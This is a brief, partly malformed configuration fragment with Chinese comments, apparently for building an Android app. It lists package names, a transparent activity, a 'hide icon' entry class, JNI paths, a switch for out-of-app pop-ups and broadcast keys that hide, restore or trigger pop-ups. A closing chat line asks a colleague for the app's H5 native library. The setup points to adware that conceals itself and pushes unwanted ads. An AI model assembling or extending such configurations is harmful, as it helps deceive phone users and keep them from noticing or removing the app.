sh['com.majestic.grand.show', 'com.cleanfre.glide.flys',  # 包名
               'com.majestic.grand.show.GrandPage',# 透明activity
               'oppo/Bio',  #  广播
               '','com.cleanfre.glide.CoreStart',  # 隐藏图标 other1","main2
               'com/caz/Ac', '"f"',  # jni路径及函数
               '/bigo',# 外弹文件开关名
               '"google"',# 广播接收key
               '"bigo"',  # 恢复
               '"kijm"',  # 隐藏
               '"plikz"']  # 外弹

pics['com.majestic.grand.show', 'com.cleanfre.glide.flys',  # 包名
                  'com/caz/Ac',
                   '"a"','"b"', '"c"',
                  'com/caz/Styls',  # hander
                  'com/caz/Nzja',  # wvcClass WebViewClient
                  'com/caz/Naz',  # WccClass WebChormeClient
                  '/bigo']#文件开关

钟哥，给一下H5的So呢，包名：com.cleanfre.glide.flys